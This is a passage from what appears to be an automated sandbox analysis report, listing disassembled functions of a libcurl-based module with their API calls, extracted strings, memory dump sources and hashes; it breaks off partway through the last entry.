                                                                                                                            • Opcode ID: 8729573473bd4b6e7aa82df4a3a41634091421992d4ebf2fe0c30f7c340f632d
                                                                                                                            • Instruction ID: 2a40773e4294824afb7e6e29f4e54f704e198f08044bcad58845c92fe6d444fa
                                                                                                                            • Opcode Fuzzy Hash: 8729573473bd4b6e7aa82df4a3a41634091421992d4ebf2fe0c30f7c340f632d
                                                                                                                            • Instruction Fuzzy Hash: 1A11E4B9904208AADF10CE28DC41BFD77AAEB01308F0441D9E89467141DB79A74BCBD0
                                                                                                                            Function 6B70DA40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_getenv.LIBCURL(CURL_SSL_BACKEND,?,?,?,6B70CB27,00000000,6B6D692E), ref: 6B70DA73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_getenv
                                                                                                                            • String ID: CURL_SSL_BACKEND$PfskPfsk
                                                                                                                            • API String ID: 2452071183-279058013
                                                                                                                            • Opcode ID: f9ce98a363ce68133fb2a38b3ae2f06576665933ad818902badb5edf2ac06ef1
                                                                                                                            • Instruction ID: d6abead700d100f8d0f0ecb1a5c554a8fcd9190e927c1330d72a5ff6bfc7c8a0
                                                                                                                            • Opcode Fuzzy Hash: f9ce98a363ce68133fb2a38b3ae2f06576665933ad818902badb5edf2ac06ef1
                                                                                                                            • Instruction Fuzzy Hash: F7010CF36682014BDB049AA0B900B1B37E8EB8135AF05007BF829C3214EB39D651D755
                                                                                                                            Function 6B71C4C3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6B71C475,?,?,6B71C43D,?,00000000,?), ref: 6B71C4D8
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B71C4EB
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,6B71C475,?,?,6B71C43D,?,00000000,?), ref: 6B71C50E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: fd514d9c233de41f0ad442f82b1d50f36bef37a2764034177f1dad18ee58fc43
                                                                                                                            • Instruction ID: c0c5a2e2f0e8c37def13508468120f28c15a222ddf030fb2bdbb48d959e838f4
                                                                                                                            • Opcode Fuzzy Hash: fd514d9c233de41f0ad442f82b1d50f36bef37a2764034177f1dad18ee58fc43
                                                                                                                            • Instruction Fuzzy Hash: D2F01231504118FBDF019BA1C909B9E7F64EB0575AF200075B811A5151DB35EF01DAA0
                                                                                                                            Function 6B725E4D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 6B725E65
                                                                                                                              • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
                                                                                                                              • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
                                                                                                                            • _free.LIBCMT ref: 6B725E77
                                                                                                                            • _free.LIBCMT ref: 6B725E89
                                                                                                                            • _free.LIBCMT ref: 6B725E9B
                                                                                                                            • _free.LIBCMT ref: 6B725EAD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: 1ea4897fc4f80f714bb10ef4181ae0f2cfffe0459d1faac63faac4481c569560
                                                                                                                            • Instruction ID: ea0c1e86433772410c5e793d649ef244ac668b12abb59761bea8836ce381bda0
                                                                                                                            • Opcode Fuzzy Hash: 1ea4897fc4f80f714bb10ef4181ae0f2cfffe0459d1faac63faac4481c569560
                                                                                                                            • Instruction Fuzzy Hash: 60F04F719186049F8B14EA74E3D6D1F33E9BA002157940C6AF128EF508D778F8808AB4
                                                                                                                            Function 6B6C5C60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 335COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6C6970: inet_pton.WS2_32(00000002,?,?), ref: 6B6C699A
                                                                                                                              • Part of subcall function 6B6C6970: inet_pton.WS2_32(00000017,?,?), ref: 6B6C69AB
                                                                                                                            • inet_pton.WS2_32(00000002,?,?), ref: 6B6C5CC3
                                                                                                                            • inet_pton.WS2_32(00000017,?,?), ref: 6B6C5CD2
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C5D8E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: inet_pton$___from_strstr_to_strchr
                                                                                                                            • String ID: /
                                                                                                                            • API String ID: 1475684856-2043925204
                                                                                                                            • Opcode ID: eee6e752fd65d7145f0f56a5990a1a1d190b4d472656cf0a15dc017745d1ea8f
                                                                                                                            • Instruction ID: e7f19a264151a2e16f5a9ae67d094739493c184d1246e6eada169ab2cfe1eb08
                                                                                                                            • Opcode Fuzzy Hash: eee6e752fd65d7145f0f56a5990a1a1d190b4d472656cf0a15dc017745d1ea8f
                                                                                                                            • Instruction Fuzzy Hash: 62C1A2F1A007469BDB11DF78CD466ABBBF4EF09200F0401A9ED69D7641EB39E514CBA2
                                                                                                                            Function 6B6CCD00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,6B6CD060,?,?,6B6CBEF5), ref: 6B6CCE4D
                                                                                                                            Strings
                                                                                                                            • We got a 421 - timeout!, xrefs: 6B6CCE70
                                                                                                                            • FTP response timeout, xrefs: 6B6CCE98
                                                                                                                            • FTP response aborted due to select/poll error: %d, xrefs: 6B6CCE54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout!
                                                                                                                            • API String ID: 1452528299-2064316097
                                                                                                                            • Opcode ID: 0bb0ecf8a2f90b5623ebcc2ef355cd76d95ea3456760cfb272d21bd77b8442f2
                                                                                                                            • Instruction ID: 5a71750539b3b68a226b8c8953bc958952d27f2ebd5cc9cfba46b27011950fe4
                                                                                                                            • Opcode Fuzzy Hash: 0bb0ecf8a2f90b5623ebcc2ef355cd76d95ea3456760cfb272d21bd77b8442f2
                                                                                                                            • Instruction Fuzzy Hash: 1251B4B6E012099FDB108F68DC40BAFBBB5FF49315F1001B6E81997250E7399A51CBE2
                                                                                                                            Function 6B6CCB00 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • getsockname.WS2_32(BB830100,?,?), ref: 6B6CCB43
                                                                                                                            • accept.WS2_32(?,?,00000080), ref: 6B6CCB6B
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                              • Part of subcall function 6B6EA660: ioctlsocket.WS2_32(00000000,8004667E,TElk), ref: 6B6EA67A
                                                                                                                            Strings
                                                                                                                            • Connection accepted from server, xrefs: 6B6CCBAB
                                                                                                                            • Error accept()ing server connect, xrefs: 6B6CCB87
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: acceptcurl_msnprintfcurl_mvsnprintfgetsocknameioctlsocket
                                                                                                                            • String ID: Connection accepted from server$Error accept()ing server connect
                                                                                                                            • API String ID: 1634289926-2331703088
                                                                                                                            • Opcode ID: 60b7e900826d5f6cc0cb1874e2900e16fa54baad64253a9e968bd4b17a532e8a
                                                                                                                            • Instruction ID: ada5297b166b2fa2c4d7e13e662700ac1c9cfcb76f404c4c0407657e0163353c
                                                                                                                            • Opcode Fuzzy Hash: 60b7e900826d5f6cc0cb1874e2900e16fa54baad64253a9e968bd4b17a532e8a
                                                                                                                            • Instruction Fuzzy Hash: 0031CAB1A00214ABDB10DF78DC81BEEB7B8EF45315F0042A6FC5DA7181DF355A548BA5
                                                                                                                            Function 6B71D007 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,8hlk,?,6B71CF35,8hlk,6B73E6B8,0000000C,6B71CFE7,6B73E430), ref: 6B71D05D
                                                                                                                            • GetLastError.KERNEL32(?,6B71CF35,8hlk,6B73E6B8,0000000C,6B71CFE7,6B73E430), ref: 6B71D067
                                                                                                                            • __dosmaperr.LIBCMT ref: 6B71D092
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                            • String ID: 8hlk
                                                                                                                            • API String ID: 2583163307-1094126001
                                                                                                                            • Opcode ID: 112f1eb2349d3e637fa66062201c53ad3543ef5defb52f54f48726d4c4a92279
                                                                                                                            • Instruction ID: 1e54765ceb3e35325045d6710ad986ea782c0ea6bb4879c3f9f9987a5a20f32b
                                                                                                                            • Opcode Fuzzy Hash: 112f1eb2349d3e637fa66062201c53ad3543ef5defb52f54f48726d4c4a92279
                                                                                                                            • Instruction Fuzzy Hash: 87014833A4D1682AD7241238864E72D279D4B82774F1A01BDF8288B2C1DB79D88249B4
                                                                                                                            Function 6B6C90C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6FACC0: GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B6FAEAE), ref: 6B6FACCE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6B6C90FD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                            • API String ID: 1646373207-3788156360
                                                                                                                            • Opcode ID: e011e7b2127639d885e145f53f687ff43bf6dae188350a6def1bb71b317858d1
                                                                                                                            • Instruction ID: cc78bae1831477c370832731a2dd850b2f24cd7a7889d4db4c3b572d7ea28ec5
                                                                                                                            • Opcode Fuzzy Hash: e011e7b2127639d885e145f53f687ff43bf6dae188350a6def1bb71b317858d1
                                                                                                                            • Instruction Fuzzy Hash: ACF065F07102426AEF051A354D1B75722659B6274EF8084FAB910D63C7EF3CD5009A11
                                                                                                                            Function 6B71A96C Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 00650575f624f1f023d20d2eabc0252473de6f364ff1646ea5faa1bfd9524979
                                                                                                                            • Instruction ID: e4ae0c13299919df07da482685717d52a29d8b6d90908ed24e2d1c1163d101d0
                                                                                                                            • Opcode Fuzzy Hash: 00650575f624f1f023d20d2eabc0252473de6f364ff1646ea5faa1bfd9524979
                                                                                                                            • Instruction Fuzzy Hash: BA4106B1A48744AFD3149F38CE05B9ABBF9EB88710F14457AF121DB680E778D98487A0
                                                                                                                            Function 6B724DB7 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 6B724E87
                                                                                                                            • _free.LIBCMT ref: 6B724EB0
                                                                                                                            • SetEndOfFile.KERNEL32(00000000,6B71D700,00000000,?,?,?,?,?,?,?,?,6B71D700,?,00000000), ref: 6B724EE2
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6B71D700,?,00000000,?,?,?,?,00000000,?), ref: 6B724EFE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1547350101-0
                                                                                                                            • Opcode ID: fab162c8438db600f8aa5f4934b79bf997fcd5468bf1ed5cd054410d70ea0b7b
                                                                                                                            • Instruction ID: 327456f4ab4e78f391ed27c79d65cd1f87291cb16060532aae433f439f9f5765
                                                                                                                            • Opcode Fuzzy Hash: fab162c8438db600f8aa5f4934b79bf997fcd5468bf1ed5cd054410d70ea0b7b
                                                                                                                            • Instruction Fuzzy Hash: E441E872D04615AFEB119BB4CF4AB8D37B9EF89724F180161F624AB290E73CCA409771
                                                                                                                            Function 6B71F53B Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,?,6B7137F2,?,00000000,00000000,?,6B7184AA,6B718987,00000000,?,00000000), ref: 6B71F540
                                                                                                                            • _free.LIBCMT ref: 6B71F59D
                                                                                                                            • _free.LIBCMT ref: 6B71F5D3
                                                                                                                            • SetLastError.KERNEL32(00000000,00000015,000000FF,?,6B7184AA,6B718987,00000000,?,00000000), ref: 6B71F5DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2283115069-0
                                                                                                                            • Opcode ID: 72ad664269fd80eee0af713f7236fccf8bc039e75db700ab93f28bd85cb57e1d
                                                                                                                            • Instruction ID: 14dab89881d43442fae6f030c3b6eb32ce262aec68d8888877e9c5cb4dba5b8b
                                                                                                                            • Opcode Fuzzy Hash: 72ad664269fd80eee0af713f7236fccf8bc039e75db700ab93f28bd85cb57e1d
                                                                                                                            • Instruction Fuzzy Hash: 4011A97220C1016FDB156E788FAAE2F22699BC6779B2C0275F238DE1D5EF2DC8114130
                                                                                                                            Function 6B71F692 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,6B711F4E,6B718951,6B718465,?,00000000,?,?,?,?,?,?,?,CMnk), ref: 6B71F697
                                                                                                                            • _free.LIBCMT ref: 6B71F6F4
                                                                                                                            • _free.LIBCMT ref: 6B71F72A
                                                                                                                            • SetLastError.KERNEL32(00000000,00000015,000000FF,?,?,?,?,?,?,?,CMnk,6B718987,00000000,?,?,0000000A), ref: 6B71F735
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2283115069-0
                                                                                                                            • Opcode ID: 21bdd52626f3ac5da70a95bc7977f9f2dc1224888168cd0c38bc26e595e88558
                                                                                                                            • Instruction ID: d812feb6ad1557dcfe5180d9e30a794d1787092ed2f881690c4fa3ebabfe3ff4
                                                                                                                            • Opcode Fuzzy Hash: 21bdd52626f3ac5da70a95bc7977f9f2dc1224888168cd0c38bc26e595e88558
                                                                                                                            • Instruction Fuzzy Hash: AD11CC3220C5016ED71125788FAAE1F26699BC6779B2C0275F539DE1E5EF3DCC114530
                                                                                                                            Function 6B6FE5D0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • QueryPerformanceCounter.KERNEL32(6B6EF03B,?,6B6C669E,6B6EF03B,?,?,?,?), ref: 6B6FE5E5
                                                                                                                            • __alldvrm.LIBCMT ref: 6B6FE5FE
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6FE627
                                                                                                                            • GetTickCount.KERNEL32 ref: 6B6FE642
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1296068966-0
                                                                                                                            • Opcode ID: f7355184a9df6e9760525add7f3249bdeedc499556cbae096beb39c87cfa10c9
                                                                                                                            • Instruction ID: d0c4c84ca8c2a4052344112868b9c7d58005e9153bdf37b92fdd47c478770901
                                                                                                                            • Opcode Fuzzy Hash: f7355184a9df6e9760525add7f3249bdeedc499556cbae096beb39c87cfa10c9
                                                                                                                            • Instruction Fuzzy Hash: F0118F72A00208AFDB149FA8DD85B69BFF9EB49208F2081BBB90CD7250D6769D11CB40
                                                                                                                            Function 6B7285FF Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000), ref: 6B728616
                                                                                                                            • GetLastError.KERNEL32(?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000,?,00000000,?,6B71EDE5,?), ref: 6B728622
                                                                                                                              • Part of subcall function 6B7285E8: CloseHandle.KERNEL32(FFFFFFFE,6B728632,?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000,?,00000000), ref: 6B7285F8
                                                                                                                            • ___initconout.LIBCMT ref: 6B728632
                                                                                                                              • Part of subcall function 6B7285AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B7285D9,6B7250EF,00000000,?,6B71E891,?,6B7192EA,00000000,?), ref: 6B7285BD
                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6B725102,00000000,00000001,00000000,00000000,?,6B71E891,?,6B7192EA,00000000,?), ref: 6B728647
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2744216297-0
                                                                                                                            • Opcode ID: 0e59e53d5547cee780dba3cd453089248bd53cac4d8b1b6bf5563cfab45b20f6
                                                                                                                            • Instruction ID: 5241c5bf5dfe7aad8811c0beb5f19ef03b52470219e5743fce7a1918cdb956a4
